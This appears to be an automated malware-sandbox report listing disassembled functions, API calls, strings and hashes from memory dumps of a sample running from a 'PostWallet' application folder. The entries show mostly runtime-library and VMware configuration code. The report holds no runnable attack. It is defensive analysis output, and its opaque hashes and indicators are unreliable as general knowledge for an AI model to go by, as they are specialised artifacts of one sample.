                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6CF74E0A
                                                    • GetLastError.KERNEL32(0000000A), ref: 6CF74E35
                                                    Strings
                                                    • Timer: QueryPerformanceFrequency failed with error , xrefs: 6CF74F3B
                                                    • Timer: QueryPerformanceCounter failed with error , xrefs: 6CF74E50
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CounterErrorLastPerformanceQuery
                                                    • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                                                    • API String ID: 1297246462-2136607233
                                                    • Opcode ID: 58bcfd7e6c47060526847f4455b0929bbe8162613bf4d4dc1cc01d7195aecf5f
                                                    • Instruction ID: 95866821fe19cdd9622967fc034587c506ee29e43f265ae7b6c01dcf86f63890
                                                    • Opcode Fuzzy Hash: 58bcfd7e6c47060526847f4455b0929bbe8162613bf4d4dc1cc01d7195aecf5f
                                                    • Instruction Fuzzy Hash: 65417D71E04248EBDF11DFA4D844FDEBBB8FB05714F50461AE915A7B80EB35A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1900 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 112stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(received %s command: %s,?,?), ref: 00ED1924
                                                    • strrchr.VCRUNTIME140(?,00000020,received %s command: %s,?,?), ref: 00ED192C
                                                      • Part of subcall function 00ED2360: strchr.VCRUNTIME140(00000000,0000002C,?,?,?,00ED1956,-00000001,00000000,00000000), ref: 00ED2379
                                                      • Part of subcall function 00ED2360: strchr.VCRUNTIME140(-00000001,0000002C,?,00000000,00000000), ref: 00ED2395
                                                      • Part of subcall function 00ED2360: atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000002,?,?,00000000,00000000), ref: 00ED23B8
                                                    Strings
                                                    • Command '%s%s' not authorized to access the specific VM socket, xrefs: 00ED19CE
                                                    • Invalid arguments to '%s%s', xrefs: 00ED19F2
                                                    • received %s command: %s, xrefs: 00ED1911
                                                    • Command '%s%s' not authorized for specified VM, xrefs: 00ED1990
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: strchr$Warningatoistrrchr
                                                    • String ID: Command '%s%s' not authorized for specified VM$Command '%s%s' not authorized to access the specific VM socket$Invalid arguments to '%s%s'$received %s command: %s
                                                    • API String ID: 3585856819-255570853
                                                    • Opcode ID: ab48529541eac92171260a805d535817f5532b23a973a532a4c0c82df0b48b84
                                                    • Instruction ID: 76a0b0f4b2f052503a280795f7cdefbf30b112f863c5724030220e015a57dbcd
                                                    • Opcode Fuzzy Hash: ab48529541eac92171260a805d535817f5532b23a973a532a4c0c82df0b48b84
                                                    • Instruction Fuzzy Hash: 5C31B96260428436DB215E658CB6FF77F6ADB93758F0820D7E945BA342D613CD0AC3B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF95C46 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF95992: _free.LIBCMT ref: 6CF959B7
                                                    • _free.LIBCMT ref: 6CF95C94
                                                      • Part of subcall function 6CF8ACB9: HeapFree.KERNEL32(00000000,00000000,?,6CF899DC), ref: 6CF8ACCF
                                                      • Part of subcall function 6CF8ACB9: GetLastError.KERNEL32(?,?,6CF899DC), ref: 6CF8ACE1
                                                    • _free.LIBCMT ref: 6CF95C9F
                                                    • _free.LIBCMT ref: 6CF95CAA
                                                    • _free.LIBCMT ref: 6CF95CFE
                                                    • _free.LIBCMT ref: 6CF95D09
                                                    • _free.LIBCMT ref: 6CF95D14
                                                    • _free.LIBCMT ref: 6CF95D1F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: eb39591fd0f0be1efd17b95bc03b99b1438c6507ce2fa1df8b035add4231ff87
                                                    • Instruction ID: 90521cfc77b36f86e1524a61d40f076d808ca9aaea2a5e23926b6b8a8fb4935f
                                                    • Opcode Fuzzy Hash: eb39591fd0f0be1efd17b95bc03b99b1438c6507ce2fa1df8b035add4231ff87
                                                    • Instruction Fuzzy Hash: 94117F31542F14EAFE20ABB0CC06FCB77EC9F01715F408D15A39A66A91DB66F5094690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2AF0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B6F
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B7C
                                                      • Part of subcall function 00ED2B60: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B84
                                                    • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,true,?,vmware-vmx-stats.exe), ref: 00ED2B16
                                                    • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,yes), ref: 00ED2B29
                                                    • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00EDB20C), ref: 00ED2B3C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _stricmp$Warning$free
                                                    • String ID: config.ini$true$yes
                                                    • API String ID: 1282723336-1982020446
                                                    • Opcode ID: 4a8e5803b625bafca5dd00c9cb4f2b5e4785925366e271aadb0f1f1771e07675
                                                    • Instruction ID: 06d5d0957297d2be8d989d62f1f78439bacdd636fe2c7afe9f3d884b28b43ac1
                                                    • Opcode Fuzzy Hash: 4a8e5803b625bafca5dd00c9cb4f2b5e4785925366e271aadb0f1f1771e07675
                                                    • Instruction Fuzzy Hash: 0CF02E329413286BCE111B663C01DDB7748DD117ABB082037FD5CB5361E752971782F6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF584F0 Relevance: 9.1, APIs: 6, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF58537
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CF58559
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF58579
                                                    • std::_Facet_Register.LIBCPMT ref: 6CF585E8
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CF58604
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6CF5864B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                    • String ID:
                                                    • API String ID: 2081738530-0
                                                    • Opcode ID: 7ac4d94cf1188b6d864fbc0b5a39cd3dc5c56578238bb7bcfc049adfb55eff4f
                                                    • Instruction ID: e99e92d7ee991df0389c58ea3503eea377360bb71431509f46882422f174a0c8
                                                    • Opcode Fuzzy Hash: 7ac4d94cf1188b6d864fbc0b5a39cd3dc5c56578238bb7bcfc049adfb55eff4f
                                                    • Instruction Fuzzy Hash: EE419075E142148FCF11CFA8C484BDEBBB0FF19328F59455AD906AB751DB30A904CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF824DA Relevance: 9.1, APIs: 6, Instructions: 119COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • DName::operator+.LIBCMT ref: 6CF8251E
                                                    • DName::operator+.LIBCMT ref: 6CF8252A
                                                      • Part of subcall function 6CF7CA50: shared_ptr.LIBCMT ref: 6CF7CA6C
                                                    • DName::operator+=.LIBCMT ref: 6CF825E8
                                                      • Part of subcall function 6CF80DB2: DName::operator+.LIBCMT ref: 6CF80E1D
                                                      • Part of subcall function 6CF80DB2: DName::operator+.LIBCMT ref: 6CF810E7
                                                      • Part of subcall function 6CF7C97B: DName::operator+.LIBCMT ref: 6CF7C99C
                                                    • DName::operator+.LIBCMT ref: 6CF825A5
                                                      • Part of subcall function 6CF7CAA8: DName::operator=.LIBVCRUNTIME ref: 6CF7CAC9
                                                    • DName::DName.LIBVCRUNTIME ref: 6CF8260C
                                                    • DName::operator+.LIBCMT ref: 6CF82618
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                                    • String ID:
                                                    • API String ID: 2795783184-0
                                                    • Opcode ID: 21300281eb13e9a7d68462c03e432436b47aef9ead81fcc84945972a7fcee600
                                                    • Instruction ID: 0486528cb971c1a3694d0e804b717400247eabbadd698ee8fde12bc31a6a6403
                                                    • Opcode Fuzzy Hash: 21300281eb13e9a7d68462c03e432436b47aef9ead81fcc84945972a7fcee600
                                                    • Instruction Fuzzy Hash: CD410AB1A422449FDF10DFA8D864BDE7BF5EB0A304F400499E196DB781DB357984C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF7B4A0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000001,?,6CF7B410,6CF77726,6CF779B7,?,6CF77BEF,?,00000001,?,?,00000001,?,6CFB6BF0,0000000C,6CF77CE8), ref: 6CF7B4AE
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CF7B4BC
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CF7B4D5
                                                    • SetLastError.KERNEL32(00000000,6CF77BEF,?,00000001,?,?,00000001,?,6CFB6BF0,0000000C,6CF77CE8,?,00000001,?), ref: 6CF7B527
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 756264d5a7b78d4636e5ac124e214a40a73852d0d2bad12075dfab79f1d87285
                                                    • Instruction ID: a626c0bb35e8e8ae480a1f0a107278ae784d8a704fc234e2b72bb31fce338851
                                                    • Opcode Fuzzy Hash: 756264d5a7b78d4636e5ac124e214a40a73852d0d2bad12075dfab79f1d87285
                                                    • Instruction Fuzzy Hash: 1601D83371A3125F9A751FB57C8DA973778EB0337C760072BF52045AE8EF6258055160
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF93ED0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, xrefs: 6CF93ED5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                                    • API String ID: 0-457501829
                                                    • Opcode ID: d7d9f805d6e76997cd89e44f8eb301548635dbbb79f5381e759e79736dbfd060
                                                    • Instruction ID: 4f6570b9318bf88e238c5125a9d0297fa45aaab6298ba7fd2064f271f081a563
                                                    • Opcode Fuzzy Hash: d7d9f805d6e76997cd89e44f8eb301548635dbbb79f5381e759e79736dbfd060
                                                    • Instruction Fuzzy Hash: 5021F671609215BFEF189F669C84D9BB7BCEF0136C7044615F91E87A50E731DC1887A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2CB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B6F
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B7C
                                                      • Part of subcall function 00ED2B60: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B84
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED2CED
                                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00ED2D00
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED2D0B
                                                    Strings
                                                    • VMAuthdConfigGetLong: value %s for variable %s is invalid, xrefs: 00ED2D20
                                                    • config.ini, xrefs: 00ED2CC6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning_errno$freestrtol
                                                    • String ID: VMAuthdConfigGetLong: value %s for variable %s is invalid$config.ini
                                                    • API String ID: 145506635-3122803469
                                                    • Opcode ID: fdba20de556d628f9b3ca7c213e62ae8a2bb44b0604d9b492091e05c58f96057
                                                    • Instruction ID: 4693fdce68e9952685bbe73e0eafc438621488c8e4ffc5610471f1cf2e5c5558
                                                    • Opcode Fuzzy Hash: fdba20de556d628f9b3ca7c213e62ae8a2bb44b0604d9b492091e05c58f96057
                                                    • Instruction Fuzzy Hash: C4110831601208AFC720AF65EC45BAE77A8EF55711F0400AFF9056B391DB715E45C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2D50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B6F
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B7C
                                                      • Part of subcall function 00ED2B60: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B84
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED2D8D
                                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00ED2DA0
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED2DAB
                                                    Strings
                                                    • config.ini, xrefs: 00ED2D66
                                                    • VMAuthdConfigGetULong: value %s for variable %s is invalid, xrefs: 00ED2DC0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning_errno$freestrtoul
                                                    • String ID: VMAuthdConfigGetULong: value %s for variable %s is invalid$config.ini
                                                    • API String ID: 3959447487-65099484
                                                    • Opcode ID: fec8aadbb953cd1fad9b87ceb5ab6e8ab7289a7465df29d6494cb2685053725f
                                                    • Instruction ID: 6471e76b8ec4d646b892ec128002f2c983146973b342debe658ca8c8f8e47a9d
                                                    • Opcode Fuzzy Hash: fec8aadbb953cd1fad9b87ceb5ab6e8ab7289a7465df29d6494cb2685053725f
                                                    • Instruction Fuzzy Hash: BC11E131601208AFC720AF69EC46BAE7BA8EF55711F0000AFF905AB391DB755E46C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF8C8F6 Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                    • _free.LIBCMT ref: 6CF8CBE1
                                                    • _free.LIBCMT ref: 6CF8CBFA
                                                    • _free.LIBCMT ref: 6CF8CC38
                                                    • _free.LIBCMT ref: 6CF8CC41
                                                    • _free.LIBCMT ref: 6CF8CC4D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3291180501-0
                                                    • Opcode ID: 6fac7c846a5551d5eff30999e4ca78523a7c51e2fbd837a3a3ab72db32ed4816
                                                    • Instruction ID: ed287ecc69981a86c493d1954ccc3e32b01d089be5c1ea054576065fb2703042
                                                    • Opcode Fuzzy Hash: 6fac7c846a5551d5eff30999e4ca78523a7c51e2fbd837a3a3ab72db32ed4816
                                                    • Instruction Fuzzy Hash: 28B16B75A02619DFDB24DF19C884B99B7B4FF09718F1046EAD84AA7750D731AE90CF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF8C46B Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF8FD6B: HeapAlloc.KERNEL32(00000000,00013385,00013385,?,6CF943D9,00000220,6CF8D246,00013385,?,?,?,?,00000000,00000000,?,6CF8D246), ref: 6CF8FD9D
                                                    • _free.LIBCMT ref: 6CF8C57A
                                                    • _free.LIBCMT ref: 6CF8C591
                                                    • _free.LIBCMT ref: 6CF8C5AE
                                                    • _free.LIBCMT ref: 6CF8C5C9
                                                    • _free.LIBCMT ref: 6CF8C5E0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$AllocHeap
                                                    • String ID:
                                                    • API String ID: 1835388192-0
                                                    • Opcode ID: 2df9209defe952386f5c4df85d6338dd650f035222d51fc15e14429a4ea509f9
                                                    • Instruction ID: 4b9623a0bb7df552eee70c2900adff595bf6ec292303c79b8ea8316e5a5ed3bb
